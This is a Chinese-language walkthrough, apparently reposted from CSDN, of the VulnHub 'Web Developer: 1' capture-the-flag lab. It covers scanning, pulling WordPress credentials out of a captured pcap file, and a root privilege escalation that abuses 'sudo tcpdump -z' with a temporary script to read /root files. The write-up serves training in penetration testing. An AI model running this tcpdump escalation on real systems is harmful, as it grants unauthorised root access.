欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 创投人物 > vulnhub-Web Developer 1靶机

vulnhub-Web Developer 1靶机

2024/10/25 19:37:43 来源:https://blog.csdn.net/wjSteve/article/details/142726144  浏览:    关键词:vulnhub-Web Developer 1靶机

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240927105502127

靶机在192.168.114.129,扫描端口

image-20240927105531584

有网站服务,访问

image-20240927105614112

没什么东西,扫目录

image-20240927105857018

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

image-20240927110129801

这次多出来一个ipdata目录

image-20240927110151616

里面有个cap文件,下载

image-20240927110440782

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

image-20240927110929501

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

image-20240927113845080

根据sudo -l,我们可以运行tcpdump

image-20240927113925849

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

image-20240927114206130

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

image-20240927114407300

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

image-20240927114357740

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com